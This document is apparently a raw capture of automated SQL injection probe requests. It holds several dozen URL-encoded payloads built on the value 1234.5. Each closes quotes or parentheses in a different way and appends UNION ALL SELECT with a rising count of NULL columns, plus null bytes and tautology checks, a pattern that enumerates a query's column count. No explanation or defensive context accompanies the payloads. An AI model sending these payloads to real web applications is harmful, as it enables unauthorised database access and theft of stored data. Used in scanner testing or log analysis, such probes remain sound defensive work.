1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22Xwni%22%20LIKE%20%22Xwni 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22PJAb%22%20LIKE%20%22PJAb 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22AMIX%22%20LIKE%20%22AMIX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ryqP%22%20LIKE%20%22ryqP 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22mvti%22%20LIKE%20%22mvti 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22Chyg%22%20LIKE%20%22Chyg 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22oFjX%22%20LIKE%20%22oFjX 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22unAp%22%20LIKE%20%22unAp 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22XiwK%22%20LIKE%20%22XiwK 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22bTmL%22%20LIKE%20%22bTmL 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22gVpm%22%20LIKE%20%22gVpm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22nlvc%22%20LIKE%20%22nlvc 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22jgwx%22%20LIKE%20%22jgwx 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22kEme%22%20LIKE%20%22kEme 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Kzjg%22%20LIKE%20%22Kzjg 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22TmMw%22%20LIKE%20%22TmMw 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ncDb%22%20LIKE%20%22ncDb 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22eXdN%22%20LIKE%20%22eXdN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22vjOF%22%20LIKE%20%22vjOF 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22VOqd%22%20LIKE%20%22VOqd 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22QIzH%22%20LIKE%20%22QIzH 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22OlQa%22%20LIKE%20%22OlQa 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22GtKs%22%20LIKE%20%22GtKs 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22QPjE%22%20LIKE%20%22QPjE 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22tzRp%22%20LIKE%20%22tzRp 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22fcqc%22%20LIKE%20%22fcqc 1234.5%29%20WHERE%208883%3D8883%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%203910%3D3910%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%202052%3D2052%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209625%3D9625%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%208417%3D8417%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205305%3D5305%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%208812%3D8812%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209319%3D9319%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%201207%3D1207%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%208553%3D8553%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%205960%3D5960%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%207778%3D7778%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%209487%3D9487%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%204823%3D4823%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%201559%3D1559%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%204555%3D4555%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%208510%3D8510%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%208345%3D8345%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206209%3D6209%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206374%3D6374%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%208508%3D8508%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209304%3D9304%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%207026%3D7026%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%208446%3D8446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209924%3D9924%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202185%3D2185%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%201407%3D1407%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%204879%3D4879%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202825%3D2825%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%206059%3D6059%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205114%3D5114%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%202330%3D2330%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205947%3D5947%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205029%3D5029%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 